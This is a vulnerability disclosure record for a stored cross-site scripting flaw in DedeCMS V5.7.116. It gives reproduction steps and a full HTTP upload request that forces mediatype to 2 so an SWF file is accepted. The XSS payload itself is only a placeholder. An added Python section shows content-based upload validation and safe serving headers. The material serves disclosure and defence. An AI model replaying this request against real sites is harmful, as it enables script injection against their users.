| Title | DedeCMS V5.7.116 Cross Site Scripting |
|---|
| Description | Summary
DedeCMS V5.7.116 is affected by a stored cross-site scripting vulnerability that can be exploited by an attacker to upload a malicious SWF file, which can lead to XSS attacks. This vulnerability exists due to insufficient input validation and sanitization of user-supplied data.
Details
1. Log in and go to http://target-ip/member/uploads_add.php to upload the XSS payload in a .SWF file.
2. Intercept the upload request and change the mediatype parameter in the request to 2.
3. Observe the response, which should include a URL similar to /uploads/userup/1/XXXX.swf.
4. Access the provided URL to trigger the XSS vulnerability.
POC
POST /member/uploads_add.php HTTP/1.1
Host: target-ip
Content-Length: 963
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfRghPB9M7esxjc3h
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: [users'cookie]
Connection: keep-alive
------WebKitFormBoundaryfRghPB9M7esxjc3h
Content-Disposition: form-data; name="f"
------WebKitFormBoundaryfRghPB9M7esxjc3h
Content-Disposition: form-data; name="mediatype"
2
------WebKitFormBoundaryfRghPB9M7esxjc3h
Content-Disposition: form-data; name="keyword"
------WebKitFormBoundaryfRghPB9M7esxjc3h
Content-Disposition: form-data; name="dopost"
save
------WebKitFormBoundaryfRghPB9M7esxjc3h
Content-Disposition: form-data; name="title"
123
------WebKitFormBoundaryfRghPB9M7esxjc3h
Content-Disposition: form-data; name="addonfile"; filename="xsstest.swf"
Content-Type: application/x-shockwave-flash
[xss payload in swf]
------WebKitFormBoundaryfRghPB9M7esxjc3h-- |
|---|
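The root cause in the description above is that the upload handler trusts the client-supplied mediatype field and file name instead of the bytes of the file. The following is an added example, not DedeCMS code: a validator that decides from the file's magic bytes, so an SWF is rejected whatever mediatype or extension the request claims, plus the response headers a defender would set when serving anything stored under /uploads/. The image allow-list and function names are assumptions.

```python
"""Content-based upload validation: added example, not DedeCMS code.
Decides from the file's own bytes, never from the client-supplied
mediatype field or the file name, so a .swf (or a renamed SWF) is
rejected before it is stored under /uploads/."""

# SWF files start with FWS (uncompressed), CWS (zlib) or ZWS (LZMA).
SWF_MAGIC = (b"FWS", b"CWS", b"ZWS")
# Magic bytes of the image formats this (assumed) upload endpoint accepts.
IMAGE_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
EXT_ALIASES = {"jpeg": "jpg"}


def sniff_type(data: bytes) -> str:
    """Return the real file type from its leading bytes, or 'unknown'."""
    if data[:3] in SWF_MAGIC:
        return "swf"
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return "unknown"


def validate_upload(filename: str, mediatype: str, data: bytes) -> tuple:
    """Return (accepted, reason). `mediatype` is the client's claim (the PoC
    above sets it to 2) and is deliberately not used for the decision."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    ext = EXT_ALIASES.get(ext, ext)
    if ext not in set(IMAGE_MAGIC.values()):
        return False, f"extension {ext!r} is not on the allow-list"
    kind = sniff_type(data)
    if kind == "swf":
        return False, f"SWF content rejected regardless of mediatype={mediatype}"
    if kind != ext:
        return False, f"content is {kind}, but extension says {ext}"
    return True, f"accepted as {kind}"


def download_headers(stored_name: str) -> dict:
    """Headers for serving anything under /uploads/: force a download and
    forbid MIME sniffing so the browser never renders or executes it."""
    return {
        "Content-Type": "application/octet-stream",
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'attachment; filename="{stored_name}"',
    }
```

The inputs in the test are constructed header bytes, not real files; in production the sniffed type should also be the source of the stored extension.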
| Source | https://github.com/Hebing123/cve/issues/77 |
|---|
| User | jiashenghe (UID 39445) |
|---|
| Submitted | 2024-11-27 09:16 AM (2 years ago) |
|---|
| Moderation | 2024-12-04 05:31 PM (7 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 286903 [DedeCMS 5.7.116 SWF File /member/uploads_add.php mediatype cross site scripting] |
|---|
| Points | 20 |
|---|